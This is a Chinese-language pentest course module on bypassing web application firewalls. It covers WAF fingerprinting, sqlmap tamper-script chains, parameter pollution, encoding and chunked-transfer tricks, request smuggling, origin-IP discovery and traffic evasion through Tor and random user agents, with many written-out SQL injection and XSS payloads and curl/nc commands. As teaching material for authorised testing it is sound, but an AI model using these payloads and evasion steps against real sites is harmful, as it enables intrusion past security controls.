================================================================================
模块 09：WAF绕过与高级技巧
================================================================================
模块标题：终极技巧 — WAF绕过、高级攻击向量与隐蔽性渗透
学习目标：
  1. 深入理解WAF的工作原理和检测机制
  2. 掌握wafw00f精确识别WAF类型
  3. 熟练使用sqlmap tamper脚本绕过WAF
  4. 掌握HTTP参数污染(HPP)绕过技术
  5. 理解多种编码绕过技术
  6. 掌握分段传输(Chunked Transfer)绕过技巧
  7. 了解云WAF的特殊绕过方法
  8. 掌握高级流量混淆和规避检测的技巧
工具分类：高级渗透 / WAF绕过
推荐工具：wafw00f, sqlmap (tamper), burpsuite, curl
优先级：★★★★★ (生产环境渗透必备技能)
================================================================================

============================================================
第一部分：WAF检测与识别
============================================================

【1.1 WAF工作原理】

WAF (Web Application Firewall) 位于客户端和Web服务器之间，
分析HTTP流量并拦截恶意请求。

WAF部署模式:
  1. 反向代理模式 (最常见)
     客户端 → WAF → Web服务器

  2. 透明模式 (Bridge)
     客户端 → WAF(透明桥接) → Web服务器

  3. 嵌入式模式 (Plugin/Module)
     作为Web服务器模块运行 (如ModSecurity)

  4. 云WAF (CDN集成)
     客户端 → Cloud CDN/WAF → 源站

WAF检测层:
  第1层: 协议合规检查 (HTTP协议格式验证)
  第2层: 签名匹配 (已知攻击模式匹配)
  第3层: 规则引擎 (自定义规则)
  第4层: 行为分析 (异常流量检测)
  第5层: 机器学习 (AI-based异常检测)

【1.2 使用wafw00f识别WAF】

Step 1: 基本WAF检测
  终端:
  wafw00f http://example.com
  
  输出解读:
  - 目标是否有WAF
  - WAF类型/品牌
  - WAF厂商

Step 2: 详细输出
  终端:
  wafw00f -v http://example.com
  
  显示: 每个检测请求和响应

Step 3: 测试所有检测方法
  终端:
  wafw00f -a http://example.com

Step 4: 批量检测
  终端:
  wafw00f -i targets.txt

【1.3 手工WAF检测方法】

方法1: 发送恶意payload观察响应
  curl -v "http://example.com/?id=1' OR '1'='1"
  
  WAF拦截特征:
  - 返回 403 Forbidden
  - 返回 406 Not Acceptable
  - 返回自定义错误页 (如 "Request blocked")
  - 返回空响应
  - 响应头中有特殊标记

方法2: 检查响应头
  curl -I http://example.com
  
  寻找以下头部:
  X-CDN: Cloudflare
  X-Sucuri-ID: xxxxx
  Server: cloudflare
  X-WAF: ModSecurity
  CF-Ray: xxxxx           ← Cloudflare
  X-Amz-Cf-Id: xxxxx      ← AWS CloudFront
  X-Akamai-Transformed:   ← Akamai
  X-Frame-Options: 某些WAF添加
  Set-Cookie: __cfduid=   ← Cloudflare Cookie
  Set-Cookie: citrix_ns_id ← Citrix NetScaler

方法3: 检查HTTP响应码异常
  正常响应: 200 OK
  恶意请求:
  - 403 → 被WAF拦截
  - 503 → WAF无法连接后端
  - 连接被重置 (RST) → 某些硬件WAF

方法4: 通过大小写变化检测
  <script>alert(1)</script>  → 可能被拦截
  <ScRiPt>alert(1)</ScRiPt>  → 如果也拦截，WAF规则不够精确

方法5: 通过HTTP版本差异
  GET /?id=1' HTTP/1.0
  GET /?id=1' HTTP/1.1
  → 某些WAF对不同版本处理不同

方法6: 溢出测试
  超长URL → WAF可能有缓冲区限制
  超多参数 → 某些WAF限制参数数量

【1.4 常见WAF应对策略速查表】

┌─────────────┬──────────────────────────────────┐
│ WAF类型      │ 绕过策略                          │
├─────────────┼──────────────────────────────────┤
│ Cloudflare   │ 寻找真实IP(历史DNS/SSL证书)       │
│              │ CloudFlair工具扫描              │
│              │ 使用子域名绕过                   │
├─────────────┼──────────────────────────────────┤
│ ModSecurity  │ CRS规则集已知绕过模式            │
│              │ 大小写绕过、编码绕过             │
├─────────────┼──────────────────────────────────┤
│ Imperva      │ HTTP/2、payload截断             │
│              │ 分段传输                         │
├─────────────┼──────────────────────────────────┤
│ F5 Big-IP    │ 特殊URL编码                      │
│              │ HTTP Smuggling                  │
├─────────────┼──────────────────────────────────┤
│ AWS WAF      │ 超长payload破解规则长度限制       │
│              │ 盲SQL (基于时间) 绕过检测        │
├─────────────┼──────────────────────────────────┤
│ 默认WAF      │ 多编码组合                       │
│              │ 分段绕过                         │
└─────────────┴──────────────────────────────────┘

============================================================
第二部分：sqlmap Tamper脚本深度解析
============================================================

【2.1 Tamper脚本概览】

tamper脚本是sqlmap中用于修改payload以绕过WAF的插件。
ArchStrike中的sqlmap包含60+内置tamper脚本。

查看所有tamper:
  sqlmap --list-tampers

【2.2 Tamper脚本分类详解】

分类1: 空格绕过类
  问题: WAF检测 "UNION SELECT" 和空格组合

  space2comment.py → 空格替换为 /**/
    原始:  UNION SELECT
    转换后: UNION/**/SELECT
    适用: 多数WAF

  space2plus.py → 空格替换为 +
    原始:  UNION SELECT 1
    转换后: UNION+SELECT+1
    适用: 简单WAF

  space2randomblank.py → 随机空白字符替换
    原始:  UNION SELECT
    转换后: UNION%09SELECT / UNION%0ASELECT
    适用: 签名匹配型WAF

  space2hash.py → 空格替换为 #随机字符串%0A
    原始:  1 AND 9227=9227
    转换后: 1%23random%0AAND%23random%0A9227=9227
    适用: MySQL + ModSecurity

  space2mssqlblank.py → MSSQL支持的空白字符
    适用: MSSQL

  space2mysqldash.py → 空格替换为虚线注释
    原始:  1 UNION SELECT
    转换后: 1--%0AUNION--%0ASELECT
    适用: MySQL

分类2: 关键词绕过类

  randomcase.py → 随机大小写
    原始:  UNION SELECT
    转换后: UnIoN sElEcT
    适用: 大小写敏感的简单WAF

  uppercase.py → 全大写
    原始:  union select
    转换后: UNION SELECT
    适用: 某些特殊场景

  equaltolike.py → = 替换为 LIKE
    原始:  SELECT * FROM users WHERE id=1
    转换后: SELECT * FROM users WHERE id LIKE 1
    适用: 检测=号的WAF

  between.py → > < = 替换为 BETWEEN
    原始:  WHERE id > 1 AND id < 10
    转换后: WHERE id BETWEEN 1 AND 10
    适用: 检测比较操作符的WAF

  apostrophemask.py → 单引号 UTF-8 编码
    原始:  'admin'
    转换后: %EF%BC%87admin%EF%BC%87
    适用: 某些数据库解析UTF-8宽字符

  apostrophenullencode.py → 单引号替换
    原始:  AND '1'='1'
    转换后: AND %00%271%00%27=%00%271%00%27
    适用: 某些应用层WAF

分类3: 编码绕过类

  charencode.py → URL编码
    原始:  UNION SELECT
    转换后: %55%4E%49%4F%4E%20%53%45%4C%45%43%54
    适用: 不进行URL解码的WAF

  charunicodeencode.py → Unicode编码
    原始:  UNION SELECT
    转换后: %u0055%u004E%u0049%u004F%u004E...
    适用: 支持Unicode解码的WAF

  chardoubleencode.py → 双重URL编码
    原始:  UNION
    转换后: %2555%254E%2549%254F%254E
    适用: 单次解码后检测的WAF

  base64encode.py → Base64编码
    原始:  UNION SELECT
    转换后: VU5JT04gU0VMRUNU
    适用: 后端支持Base64解码(MSSQL等)

  hex2char.py → 十六进制编码
    适用: MySQL, PostgreSQL

分类4: 数据库特定类

  versionedkeywords.py → MySQL版本化注释
    原始:  UNION SELECT
    转换后: /*!UNION*/ /*!SELECT*/
    适用: MySQL

  versionedmorekeywords.py → 更多版本化注释
    原始:  1 UNION ALL SELECT NULL,CONCAT(...)
    转换后: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!CONCAT*/(...)
    适用: MySQL

  commentbeforeparentheses.py → 注释插入
    原始: SELECT()
    转换后: SELECT/**/()
    适用: 某些WAF检测 keyword(

  halfversionedmorekeywords.py → 半版本化注释
    适用: MySQL

分类5: 其他技巧类

  xforwardedfor.py → 伪造X-Forwarded-For头
    用途: 规避基于IP的频率限制

  modsecurityversioned.py → 针对ModSecurity
    原始:  1 AND 2>1
    转换后: 1 /*!30874AND 2>1*/
    适用: ModSecurity CRS

  modsecurityzeroversioned.py → 针对ModSecurity 0版本
    原始:  1 AND 2>1
    转换后: 1 /*!00000AND 2>1*/
    适用: ModSecurity

  printf2char.py → printf格式化
    适用: 某些特殊情况

  substrchar.py → SUBSTR替换
    适用: 被检测SUBSTRING的地方

  multiplespaces.py → 多个空格
    原始:  UNION SELECT
    转换后: UNION   SELECT
    适用: 简单WAF

  overlongutf8.py → 超长UTF-8编码
    适用: 某些老旧的检测引擎

  luanginx.py → Lua + Nginx绕过
    原始:  UNION(SELECT)
    转换后:  UNIOUNIONN SELSELECTECT
    适用: 特定nginx+lua配置

  information_schemacomment.py → information_schema加注释
    适用: MySQL

  ifnull2casewhenisnull.py → IFNULL转CASE WHEN
    适用: 检测IFNULL的WAF

  nonrecursivereplacement.py → 非递归替换绕过
    原始:  UNION SELECT
    转换后: UNIUNIONON SELSELECTECT
    适用: 单次替换过滤的WAF

  securesphere.py → 针对SecureSphere WAF
    适用: Imperva SecureSphere

  varnish.py → Varnish缓存绕过
    适用: 带Varnish缓存的场景

【2.3 Tamper组合策略】

# 轻度绕过 (基础防护):
sqlmap -u "URL" --tamper=space2comment,randomcase

# 中度绕过 (ModSecurity类WAF):
sqlmap -u "URL" --tamper=space2comment,randomcase,versionedkeywords

# 深度绕过 (企业级WAF):
sqlmap -u "URL" --tamper="space2comment,randomcase,charencode,versionedkeywords,equaltolike"

# 极限绕过 (多层防护):
sqlmap -u "URL" --tamper="apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2casewhenisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords"

注意: tamper越多，payload膨胀越严重，可能被WAF基于长度拦截。
建议先用2-3个tamper测试，逐步增加。

【2.4 tamper组合实验方法】

Step 1: 先用无tamper确认注入点是否存在
  sqlmap -u "URL" --batch

  如果被WAF拦截，看到 "connection timed out" 或 "403"

Step 2: 尝试单个tamper
  sqlmap -u "URL" --tamper=space2comment --batch

Step 3: 通过Burp观察tamper效果
  sqlmap -u "URL" --tamper=space2comment --proxy="http://127.0.0.1:8080"
  → 在Burp HTTP History中查看sqlmap发送的实际请求

Step 4: 逐步增加tamper直到成功

Step 5: 如果所有tamper组合失败，考虑:
  - 降低level (--level=1)
  - 降低risk (--risk=1)
  - 增加延迟 (--delay=5)
  - 使用 --time-sec 进行时间盲注
  - 更换攻击时段
  - 使用代理IP池

============================================================
第三部分：HTTP参数污染 (HPP)
============================================================

【3.1 HPP原理】

HTTP参数污染 (HTTP Parameter Pollution) 通过发送多个同名参数
来绕过WAF或改变应用程序逻辑。

示例:
  http://example.com/?id=1&id=2

不同平台的解析行为:
  PHP/Apache: 取最后一个值 → id=2
  ASP.NET/IIS: 合并为 id=1,2
  JSP/Tomcat: 取第一个值 → id=1
  Python/Flask: 取第一个值 → id=1
  Node.js/Express: 转为数组 → id=[1,2]

【3.2 HPP绕过WAF示例】

场景1: SQL注入WAF绕过
  WAF看到的: ?id=1' UNION SELECT... (被拦截)
  
  攻击者发送: ?id=1&id=1' UNION SELECT...
  WAF检查第一个id=1 → 安全，放行
  应用解析最后一个id=1' UNION SELECT... → 注入执行

场景2: XSS WAF绕过
  WAF看到的: ?q=<script>alert(1)</script> (被拦截)
  
  攻击者发送: ?q=test&q=<script>alert(1)</script>
  WAF检查第一个q=test → 安全，放行
  应用解析最后一个q=<script>alert(1)</script> → XSS执行

场景3: URL编码参数污染
  ?id=1&id=1%27%20UNION%20SELECT...
  WAF对第一个id=1正常评估 → 放行
  应用解码第二个id → 注入执行

场景4: 分号参数分隔 (部分平台)
  ?id=1;id=1' OR '1'='1
  部分平台将分号视为参数分隔符

【3.3 HPP + 其他技术组合】

HPP + SQL注释:
  ?id=1&id=1'/**/UNION/**/SELECT...

HPP + Null Byte:
  ?id=1&id=1'%00UNION SELECT...

HPP + JSON:
  {"id": 1, "id": "1' UNION SELECT..."}

HPP + 编码:
  ?id=1&id=%31%27%20%55%4e%49%4f%4e...

============================================================
第四部分：编码绕过技术
============================================================

【4.1 URL编码绕过】

单次编码:
  原始: <script>
  URL编码: %3C%73%63%72%69%70%74%3E

双重编码:
  %3C → %253C
  < → %253C%2573...

三重编码: 极少场景需要

URL编码绕过场景:
  - WAF只检查解码前的流量
  - WAF解码一次后检查，但应用解码两次
  - 不同组件解码次数不一致

【4.2 Unicode编码绕过】

UTF-8 Unicode:
  原始: ' (单引号)
  宽字节: %EF%BC%87
  适用: MySQL GBK编码场景

UTF-16:
  原始: <script>
  UTF-16BE: %00<%00s%00c%00r%00i%00p%00t%00>

UTF-7: (IE曾经支持)
  原始: <script>alert(1)</script>
  UTF-7: +ADw-script+AD4-alert(1)+ADw-/script+AD4-

【4.3 十六进制编码绕过】

HTML十六进制:
  &#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;

SQL十六进制 (MySQL):
  原始: admin
  Hex: 0x61646d696e
  或: 0x61646D696E

【4.4 Base64编码绕过】

场景: 参数经过Base64编码传递
  原始: 1' OR '1'='1
  Base64: MScgT1IgJzEnPScx
  请求: ?id=MScgT1IgJzEnPScx

  注意: 仅当应用对参数进行Base64解码后再拼接到SQL时有效

【4.5 HTML实体编码绕过】

HTML实体:
  < → &lt;
  > → &gt;
  & → &amp;
  " → &quot;
  ' → &#39; / &#x27;

混合编码绕过XSS过滤器:
  <img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;1&#41;">

【4.6 编码工具组合】

多编码测试流程:
  1. 无编码 → 测试是否被拦截
  2. URL编码 → 测试
  3. 双重URL编码 → 测试
  4. Unicode编码 → 测试
  5. Hex编码 → 测试
  6. 混合编码 → 测试
  7. 两两组合 → 测试直到绕过

============================================================
第五部分：分段传输绕过
============================================================

【5.1 HTTP Chunked Transfer Encoding】

分块传输编码是HTTP/1.1的特性，允许将HTTP body分成多个块发送。

正常POST:
  POST /vuln.php HTTP/1.1
  Content-Length: 31
  
  id=1' UNION SELECT 1,2,3 --

分块传输:
  POST /vuln.php HTTP/1.1
  Transfer-Encoding: chunked
  
  1f
  id=1' UNION SELECT 1,2,3 --
  0

WAF可能:
  - 不支持chunked解析 → 绕过
  - 重组所有chunk → 需结合编码

【5.2 Burp Suite 分块传输使用】

Step 1: Burp安装Chunked Encoding Converter扩展
  Extender → BApp Store → 搜索 "chunked" → 安装

Step 2: 使用Intruder时启用分块
  Intruder → Options → 勾选 "Use HTTP/1.1"
  移除 Content-Length
  添加 Transfer-Encoding: chunked

【5.3 使用curl测试分块传输】

# 发送chunked请求
curl -X POST http://target.com/vuln.php \
     -H "Transfer-Encoding: chunked" \
     -d "id=test' OR '1'='1"

【5.4 HTTP Smuggling (请求走私)**

HTTP请求走私是一种更高级的攻击，利用前端代理(WAF/CDN)和
后端服务器对HTTP请求边界解析不一致的漏洞。

基本类型:
  1. CL.TE (Content-Length + Transfer-Encoding)
     前端用Content-Length判断请求结束
     后端用Transfer-Encoding判断
     → 剩余部分被后端当作下一个请求的开头

  2. TE.CL
     前端用Transfer-Encoding
     后端用Content-Length

  3. TE.TE
     前后端都用Transfer-Encoding但处理不一致

请求走私可用于:
  - 绕过前端WAF
  - 缓存投毒
  - 窃取其他用户的请求
  - 反射型XSS扩大化

============================================================
第六部分：协议层绕过
============================================================

【6.1 HTTP方法绕过】

某些WAF只检查GET/POST方法:
  → 使用不常见的方法发送攻击payload

  PUT /page.php?id=1' OR '1'='1 HTTP/1.1
  PATCH /page.php?id=1' OR '1'='1 HTTP/1.1
  DELETE /page.php?id=1' UNION SELECT...
  OPTIONS /page.php?id=1' OR '1'='1

【6.2 HTTP版本切换】

  HTTP/1.0 vs HTTP/1.1:
  某些WAF对HTTP/1.0请求处理不同
  
  构建HTTP/1.0请求:
  echo -e "GET /page.php?id=1' HTTP/1.0\r\nHost: target.com\r\n\r\n" \
    | nc target.com 80

【6.3 Content-Type操纵】

修改Content-Type混淆WAF:

  正常POST (可能被WAF检查):
  Content-Type: application/x-www-form-urlencoded
  id=1' OR '1'='1

  改为multipart:
  Content-Type: multipart/form-data; boundary=X
  --X
  Content-Disposition: form-data; name="id"
  
  1' OR '1'='1
  --X--

  改为JSON (WAF检查JSON不充分):
  Content-Type: application/json
  {"id": "1' OR '1'='1"}

  改为text/xml:
  Content-Type: text/xml
  <?xml version="1.0"?><id>1' OR '1'='1</id>

  改为空/不合法类型:
  Content-Type: 

【6.4 Host头绕过】

某些WAF通过Host头做虚拟主机路由白名单:
  
  正常:
  GET /page.php?id=1' HTTP/1.1
  Host: protected-domain.com
  → WAF检查

  绕过1 (绝对URI):
  GET http://protected-domain.com/page.php?id=1' HTTP/1.1
  Host: 127.0.0.1
  → 某些WAF不处理

  绕过2 (重复Host):
  GET /page.php?id=1' HTTP/1.1
  Host: protected-domain.com
  Host: 127.0.0.1
  → WAF可能取第一个, 后端取第二个

【6.5 IP绕过 — 寻找源站真实IP】

对于云WAF (Cloudflare等), 可以直接找到源站IP绕过WAF:

方法1: DNS历史记录
  https://securitytrails.com/ → 历史DNS A记录
  https://dnsdumpster.com/ → DNS枚举

方法2: SSL证书查询
  https://crt.sh/?q=%25.example.com
  寻找非Cloudflare的IP

方法3: 子域名Fuzzing
  子域名可能直接指向源站IP

方法4: 邮件头分析
  发送找回密码邮件 → 查看邮件源码 → 可能含源站IP

方法5: 搜索引擎缓存
  site:example.com → 早于CDN的历史缓存

方法6: 扫描IP段
  扫描目标组织的IP范围 → 找到对应域名的Web服务

============================================================
第七部分：云WAF特殊绕过技巧
============================================================

【7.1 Cloudflare绕过】

  ?? 使用CloudFlair工具找真实IP:
  cloudflair example.com

  ?? 使用子域名绕过:
  direct.example.com 可能未经过CF

  ?? 使用HTTP/2:
  Cloudflare的WAF对HTTP/2的某些特性支持不完善

  ?? Cloudflare的WAF规则引擎绕过:
  - 超长URL绕过规则
  - /admin → //admin (绕过特定路径规则)

【7.2 AWS WAF绕过】

  ?? AWS WAF规则长度限制:
  某些规则有长度限制 → 超长payload可能绕过

  ?? 分段编码:
  AWS WAF对chunked处理历史有问题

【7.3 Imperva (Incapsula)绕过】

  ?? HTTP Smuggling:
  历史漏洞: CL.TE走私绕过

  ?? URI编码:
  特殊编码字符可能绕过

============================================================
第八部分：流量混淆与规避检测
============================================================

【8.1 扫描器行为伪装】

  # 随机User-Agent
  --random-agent (sqlmap)

  # 自定义延迟
  --delay=2 --randomize=0.5 (sqlmap)

  # 多线程控制
  --threads=1 (单线程, 最低调)

  # 保持会话Cookie一致
  先正常浏览获取Cookie，再使用

  # 使用Tor网络
  --tor --tor-type=SOCKS5

  # 使用代理链
  --proxy=http://127.0.0.1:8888
  (前置Burp、proxychains、Tor组合)

【8.2 请求频率控制】

  正常用户 vs 扫描器:
  用户: 每秒0.1-1个请求，随机间隔
  扫描器: 每秒10-100个请求，固定间隔

  伪装策略:
  - 随机延迟: --delay=1 --randomize=0.5
  - 分时段扫描: 避免连续请求
  - 模拟用户浏览模式
  - 混合使用低并发数

【8.3 流量特征消除】

  sqlmap默认User-Agent: sqlmap/1.6...
  → 始终使用 --random-agent 或自定义 --user-agent

  sqlmap默认参数: 包含明显测试标记
  → 使用 --tamper 消除

  Burp Suite 默认User-Agent: 
  → Firefox → about:config → 改general.useragent.override

  nikto默认User-Agent:
  → nikto -h URL -useragent "Mozilla/5.0..."

【8.4 OPSEC检查清单】

  操作安全 (Operations Security) 自查:
  
  □ 是否使用代理/VPN隐藏真实IP？
  □ 是否确认了授权范围？
  □ 是否记录了操作日志？
  □ 是否使用了非默认User-Agent？
  □ 是否控制了请求频率避免DoS？
  □ 是否在扫描前做了WAF检测？
  □ 是否清理了测试后遗留的文件？
  □ 是否在非工作时间(业务低谷)进行测试？
  □ 是否有应急联系人和中止机制？

============================================================
第九部分：WAF绕过实战演练
============================================================

【实战场景：模拟有WAF环境的渗透】

预设: 搭建一个ModSecurity + CRS规则集的测试环境

(如果没有真实WAF环境，可以用以下方式模拟:
 1. 安装ModSecurity + OWASP CRS在Apache上
 2. 使用Docker: docker pull owasp/modsecurity-crs
 3. 对比分析绕过前和绕过后的请求)

Step 1: WAF检测
  wafw00f -v http://target-with-waf.com
  记录: WAF类型、可能规则集

Step 2: 发送基本攻击payload确认WAF工作
  curl "http://target.com/?id=1' OR '1'='1"
  预期: 403 Forbidden 或连接被重置
  → WAF正常工作

Step 3: 测试空格绕过
  curl "http://target.com/?id=1'/**/OR/**/'1'='1"
  观察: 是否返回正常响应？
  → 如果是，空格绕过成功

Step 4: 测试大小写绕过
  curl "http://target.com/?id=1' oR '1'='1"
  观察响应

Step 5: 测试URL编码绕过
  curl "http://target.com/?id=1%27%20OR%20%271%27=%271"
  观察响应

Step 6: 测试HPP绕过
  curl "http://target.com/?id=1&id=1' OR '1'='1"
  观察响应

Step 7: 选择有效的绕过技术进行sqlmap测试
  sqlmap -u "http://target.com/?id=1" \
         --tamper=space2comment,randomcase \
         --proxy="http://127.0.0.1:8080" \
         --delay=2 --random-agent

Step 8: 使用Burp观察
  在Burp HTTP History中分析sqpmap发出的请求:
  - 哪些请求被WAF拦截? (403, 406)
  - 哪些请求成功到达后端? (200, 302, 500)
  - 分析成功payload的特征
  - 调整tamper组合

Step 9: 总结绕过策略
  记录有效的tamper组合和技术:
  Tamper: space2comment + versionedkeywords + randomcase
  HPP: 参数污染参数 配合
  编码: 双重URL编码
  传输: 分块传输
  方法: POST代替GET

============================================================
第十部分：tamper脚本自定制

【10.1 tamper脚本结构】

每个tamper是Python文件，包含:
  - __priority__: 执行优先级
  - dependencies(): 返回依赖项
  - tamper(payload, **kwargs): 核心函数

【10.2 自定义tamper示例】

创建 /home/a/custom_waf_bypass.py:

  #!/usr/bin/env python
  
  from lib.core.enums import PRIORITY
  
  __priority__ = PRIORITY.NORMAL
  
  def dependencies():
      pass
  
  def tamper(payload, **kwargs):
      """
      自定义绕过: 将SQL关键字用注释包裹 + 随机大小写
      """
      if payload:
          # 替换AND/OR为大小写混合
          payload = payload.replace("AND", "AnD")
          payload = payload.replace("OR", "oR")
          # 在SELECT后插入注释
          payload = payload.replace("SELECT", "SEL/**/ECT")
          payload = payload.replace("UNION", "UN/**/ION")
      return payload

使用自定义tamper:
  sqlmap -u "URL" --tamper=/home/a/custom_waf_bypass.py

【10.3 调试tamper脚本】

  # 单独测试tamper脚本
  python3 -c "
  from custom_waf_bypass import tamper
  print(tamper(\"1 AND 1=1 UNION SELECT 1,2,3\"))
  "

  # 输出:
  # 1 AnD 1=1 UN/**/ION SEL/**/ECT 1,2,3

============================================================
第十一部分：进阶绕过速查表

【WAF绕过技术总览】

  ┌─────────────────────────────┬──────────────────────────┐
  │ 绕过技术                     │ 适用场景                  │
  ├─────────────────────────────┼──────────────────────────┤
  │ 大小写变换 (SeLeCt)          │ 基础WAF/简单规则         │
  │ 注释插入 (SEL/**/ECT)        │ 中级WAF/ModSecurity      │
  │ 空白字符替换 (%09,%0A,%0D)  │ 中级WAF                  │
  │ URL编码 (%55...)             │ 中级WAF/边缘WAF         │
  │ 双重URL编码 (%2555...)       │ 高级WAF/某些CDN          │
  │ Unicode编码                  │ 宽字节场景/老旧WAF       │
  │ Base64编码                   │ 特定应用场景             │
  │ HTTP参数污染 (HPP)           │ 多层架构                 │
  │ HTTP请求走私                 │ 代理+后端架构            │
  │ 分块传输                     │ 某些WAF不支持chunked     │
  │ HTTP方法变换 (PUT/PATCH)     │ 简单WAF只检查GET/POST    │
  │ Content-Type篡改             │ WAF检查不充分的类型      │
  │ 协议降级 (HTTP/1.0)          │ 特定WAF                  │
  │ Host头绕过                   │ 虚拟主机/云WAF          │
  │ 源站IP直连                   │ 云WAF (CDN前置)          │
  │ 超长payload                  │ 规则引擎长度限制         │
  │ Null Byte注入 (%00)          │ 老旧WAF/老旧后端         │
  │ 缓冲区溢出                   │ 特定网络设备             │
  │ 时序绕过 (基于时间盲注)      │ 检测所有payload的WAF     │
  │ 外带通道 (DNS/HTTP盲打)      │ 无回显+有WAF             │
  └─────────────────────────────┴──────────────────────────┘

================================================================================
模块小结
================================================================================

完成本模块后你应该能够：
  ✓ 使用wafw00f和手工方法识别WAF类型
  ✓ 熟练使用sqlmap tamper脚本绕过WAF
  ✓ 理解HTTP参数污染(HPP)的原理和利用
  ✓ 掌握多种编码绕过技术
  ✓ 使用分段传输绕过WAF检测
  ✓ 了解HTTP请求走私的基本原理
  ✓ 使用协议层技术绕过WAF
  ✓ 对云WAF进行绕过尝试
  ✓ 编写自定义tamper脚本
  ✓ 掌握流量混淆和OPSEC操作安全

================================================================================
全部模块学习路线总结
================================================================================

模块01 → 模块02 → 模块03 → 模块04 → 模块05 → 模块06 → 模块07 → 模块08 → 模块09
  ↓       ↓        ↓        ↓        ↓        ↓        ↓        ↓        ↓
HTTP基础  信息收集  漏洞扫描  SQL注入  XSS/CSRF  文件包含  认证攻击  综合实战  WAF绕过
                                       命令注入  会话攻击            高级技巧

恭喜你完成全部9个模块的学习！你现在已经具备了Web渗透测试的完整知识体系。
下一步建议：在更多真实靶场(Bug Bounty、HackTheBox、TryHackMe)中实践并不断提升。
